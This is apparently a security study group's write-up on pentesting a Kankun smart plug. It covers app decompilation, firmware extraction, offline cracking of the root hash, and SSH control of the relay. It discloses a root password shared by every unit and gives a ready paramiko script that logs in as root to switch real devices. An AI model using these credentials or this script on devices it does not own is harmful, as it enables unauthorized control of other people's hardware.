It has now been almost one year since we started working on the Internet of Things under the IoT study group, an initiative of the Null Bhopal chapter. The Internet of Things has indeed changed the way we live, making it more comfortable, but its security remains a point of concern: small mistakes at manufacturing time can lead to serious breaches.
In the course of this learning, one of our mentors, Mr. Anant Shrivastava, sponsored a Kankun smart plug for us, and the loopholes present in it made it a perfect device for penetration testing.
The Kankun smart plug is an ON/OFF switch that can be controlled from an app. A basic port scan showed that the plug has its SSH port open by default. An open SSH service is not a vulnerability by itself, but, as shown below, combined with a root password that is the same on every unit it hands full control of the device to anyone on the same network.
Initially started with the manual. Google translate comes in handy ☺
The manual that ships with the plug says where to download the app from. The next step is to set it up: connect the smartphone and the smart plug to the same Wi-Fi network, after which the plug appears in the app's device list and can be controlled remotely. There is also a "Direct Mode", in which the smart plug acts as an access point with SSID OK_SP3 and, by default, no password on the network.
The first thing to look for was the firmware, since it gives an overview of the device's software: the filesystem, the bootloader and the binaries present are all of great help from a pentester's point of view. Firmware images are often available on the internet, but if you cannot find one, another approach is to reverse engineer the app. For that you first need the app's source. There are many ways to recover Java source from an APK; here we use a tool named jadx.
The next step is to analyse all the extracted files for hardcoded URLs. Checking the files one by one works but is time-consuming, so intelligent use of grep saves a lot of time: a recursive grep with line numbers for the string http prints every URL in every file under every sub-folder along with the line it sits on. We started by analysing the Hangzhou folder and found some hardcoded URLs.
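The grep step above, redone as a small Python tool. This is an added example and not the command or script used in the original write-up: it walks a tree of decompiled Java sources, reports every URL with its file and line number, and separately flags the ones whose path ends in a firmware-like extension such as .bin. The directory built by build_sample_tree() is a constructed stand-in for jadx output (the file names echo the post, the hosts are fake .invalid domains), so it runs offline.

```python
"""Hunt for hard-coded URLs in a tree of decompiled Java sources.

Added example; it is not the tool used in the original write-up.
The sample tree below is constructed and the hosts in it are fake.
"""
import re
import tempfile
from pathlib import Path

URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
# Extensions that suggest a firmware image rather than an API endpoint.
FIRMWARE_EXTS = (".bin", ".img", ".trx")


def find_urls(root):
    """Return (relative path, line number, url) for every URL in *.java under root."""
    hits = []
    root = Path(root)
    for path in sorted(root.rglob("*.java")):
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                for m in URL_RE.finditer(line):
                    url = m.group(0).rstrip(";,)")  # trailing Java punctuation is not part of the URL
                    hits.append((path.relative_to(root).as_posix(), lineno, url))
    return hits


def firmware_candidates(hits):
    """Keep only URLs whose path (query string ignored) ends in a firmware-like extension."""
    return [h for h in hits if h[2].split("?", 1)[0].lower().endswith(FIRMWARE_EXTS)]


def build_sample_tree():
    """Constructed stand-in for jadx output (assumption: not the real app's sources)."""
    root = Path(tempfile.mkdtemp(prefix="jadx_out_"))
    files = {
        "Hangzhou/PreferencesUtil.java": (
            "public class PreferencesUtil {\n"
            '    static final String FW_URL = "http://fw.example.invalid/kkeps.bin";\n'
            "}\n"
        ),
        "Hangzhou/ApiClient.java": (
            'String base = "https://api.example.invalid/v1/device";  // REST endpoint\n'
        ),
        "com/vendor/Noise.java": "int x = 1;\n",
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return root


if __name__ == "__main__":
    tree = build_sample_tree()
    for rel, lineno, url in find_urls(tree):
        print(f"{rel}:{lineno}: {url}")
    for rel, lineno, url in firmware_candidates(find_urls(tree)):
        print(f"firmware candidate -> {rel}:{lineno}: {url}")
```

Point it at the real jadx output directory instead of build_sample_tree() to use it on an app; the .bin filter is only a heuristic, so still read the surrounding code to confirm what a candidate URL is used for.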
The highlighted text in the screenshot shows a hardcoded URL in the file PreferencesUtil.java. Since the URL ends in .bin, it could be the link to the actual firmware, and indeed the app downloads this firmware from that URL and flashes it to the device. After downloading the firmware, run binwalk on the kkeps.bin file; it reports loads of useful information, such as LZMA compressed data, a squashfs filesystem and so on. With that information, the -e switch can be used to extract the filesystem.
Binwalk can be installed with
# sudo apt-get install binwalk
Its further dependencies can be resolved by running the dependency script provided by the binwalk project. The filesystem is then extracted with
# binwalk -e kkeps.bin
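What binwalk is doing in the step above is a signature scan: it looks for known magic bytes at every offset in the image and then sanity-checks the header around each hit before reporting it. The following is an added example of that idea, not binwalk itself and not the output for the real kkeps.bin: it knows three signatures (a U-Boot uImage header, an LZMA-alone stream header and a squashfs v4 superblock) and shows why validation matters, since the LZMA magic is a single byte that would otherwise match all over the image. The blob returned by build_sample_firmware() is constructed with those three structures at known offsets.

```python
"""Minimal binwalk-style signature scan over a firmware image.

Added example, not binwalk itself: it knows three signatures (uImage header,
LZMA stream header, squashfs superblock) and validates each hit before
reporting it. The blob built by build_sample_firmware() is constructed;
it is not the real kkeps.bin.
"""
import struct

SQUASHFS_COMP = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz"}


def parse_uimage(data, off):
    """U-Boot legacy image header: 64 bytes, big-endian, image size at +12, name at +32."""
    if off + 64 > len(data):
        return None
    size, = struct.unpack_from(">I", data, off + 12)
    name = data[off + 32:off + 64].split(b"\0", 1)[0].decode("ascii", "replace")
    return f'uImage header, image size {size} bytes, name "{name}"'


def parse_lzma(data, off):
    """LZMA-alone header: properties byte, u32 dictionary size, u64 uncompressed size.

    The single-byte magic (0x5D) matches everywhere, so the dictionary size must be a
    sane power of two and the uncompressed size either unknown (all 0xFF) or modest.
    """
    if off + 13 > len(data):
        return None
    dict_size, usize = struct.unpack_from("<IQ", data, off + 1)
    if dict_size < 1 << 12 or dict_size > 1 << 26 or dict_size & (dict_size - 1):
        return None
    if usize != 0xFFFFFFFFFFFFFFFF and usize > 1 << 30:
        return None
    shown = "unknown" if usize == 0xFFFFFFFFFFFFFFFF else str(usize)
    return f"LZMA compressed data, dictionary size {dict_size}, uncompressed size {shown}"


def parse_squashfs(data, off):
    """squashfs v4 superblock (little-endian 'hsqs'): version at +28, compression at +20."""
    if off + 48 > len(data):
        return None
    inodes, _mkfs_time, block_size = struct.unpack_from("<III", data, off + 4)
    comp, _blog, _flags, _ids, major, minor = struct.unpack_from("<HHHHHH", data, off + 20)
    bytes_used, = struct.unpack_from("<Q", data, off + 40)
    return (f"squashfs filesystem, version {major}.{minor}, "
            f"compression {SQUASHFS_COMP.get(comp, comp)}, block size {block_size}, "
            f"{inodes} inodes, {bytes_used} bytes")


SIGNATURES = [
    (b"\x27\x05\x19\x56", parse_uimage),
    (b"\x5d", parse_lzma),
    (b"hsqs", parse_squashfs),
]


def scan(data):
    """Return sorted (offset, description) for every validated signature hit."""
    results = []
    for magic, parser in SIGNATURES:
        off = data.find(magic)
        while off != -1:
            desc = parser(data, off)
            if desc:
                results.append((off, desc))
            off = data.find(magic, off + 1)
    return sorted(results)


def build_sample_firmware():
    """Constructed image: uImage at 0x40, LZMA header at 0x80, squashfs at 0x100."""
    blob = bytearray(0x40)
    # uImage: magic, hcrc, time, size, load, entry, dcrc, os=Linux, arch=MIPS, type=kernel, comp=lzma, name
    blob += struct.pack(">7I4B32s", 0x27051956, 0, 0, 0x1234, 0x80000000, 0x80000000, 0,
                        5, 5, 2, 3, b"MIPS OpenWrt Linux")
    # LZMA-alone header: 8 MiB dictionary, unknown uncompressed size
    blob += b"\x5d" + struct.pack("<IQ", 1 << 23, 0xFFFFFFFFFFFFFFFF)
    blob += bytes(0x100 - len(blob))
    # squashfs 4.0 superblock, lzma compression, 128 KiB blocks, 42 inodes, 4096 bytes used
    blob += struct.pack("<IIIIIHHHHHHQQ", 0x73717368, 42, 0, 131072, 3, 2, 17, 0xC0, 1, 4, 0, 0, 4096)
    blob += bytes(64)
    return bytes(blob)


if __name__ == "__main__":
    for off, desc in scan(build_sample_firmware()):
        print(f"0x{off:08X}  {desc}")
```

To try it on a real image, read the file into bytes and pass it to scan(); the offsets it prints are what you would hand to dd or unsquashfs to carve the filesystem by hand if binwalk's -e were not available.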
So here is the entire Linux filesystem. The next step is to get the root password, which is not very difficult once you have the whole filesystem: /etc/passwd and /etc/shadow are right there, so the hash can be cracked offline. Note that the paths below point inside the extracted squashfs, not the host's own /etc:
# unshadow squashfs-root/etc/passwd squashfs-root/etc/shadow > passwd.txt
Cracking this with John the Ripper gives the root password: p9z34c. Because the hash comes from the firmware image that every plug downloads, this is not a per-device secret; every unit running this firmware has the same root password.
CONTROLLING THE SMART PLUG WITH TERMINAL
Now that we know the root password, and since the plug has its SSH port open by default, we can SSH into it directly as root with the password p9z34c that we extracted. Turning the plug on and off is then just a matter of writing to the sysfs node that drives the relay (the firmware exposes it as an LED).
Turning the smart plug off
# echo 0 > /sys/class/leds/tp-link:blue:relay/brightness
Turning the smart plug on
# echo 1 > /sys/class/leds/tp-link:blue:relay/brightness
The whole process can be done with the following Python script that I wrote. It requires the paramiko library:
# apt-get install python-paramiko
import sys
import paramiko

BLUE, GREEN, RED, RESET = "\033[94m", "\033[92m", "\033[91m", "\033[0m"
# sysfs node behind the relay; the firmware exposes it as an LED
path = "/sys/class/leds/tp-link:blue:relay/brightness"

if len(sys.argv) < 3:
    sys.exit("usage: %s <host> on|off" % sys.argv[0])
host = sys.argv[1]
action = sys.argv[2]

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # the plug's host key is not known in advance
print(BLUE + "[*] connecting to device" + RESET)
ssh.connect(host, username="root", password="p9z34c")  # password recovered from the firmware
if action == "on":
    ssh.exec_command("echo 1 > " + path)
    print(GREEN + "[*] turning it " + action + RESET)
elif action == "off":
    ssh.exec_command("echo 0 > " + path)
    print(RED + "[*] turning it " + action + RESET)
else:
    sys.exit("unknown action: " + action)
ssh.close()
That is how we managed to control the smart plug remotely without the Android app. ☺ Nothing here is specific to us: anyone on the same Wi-Fi network, or anyone who joins the password-less OK_SP3 network in Direct Mode, can do exactly the same with the same root password.
This report is drafted under the IoT study group, an initiative by Null Bhopal chapter.
Thanks for reading!!
I also write tech and security related posts on my personal website.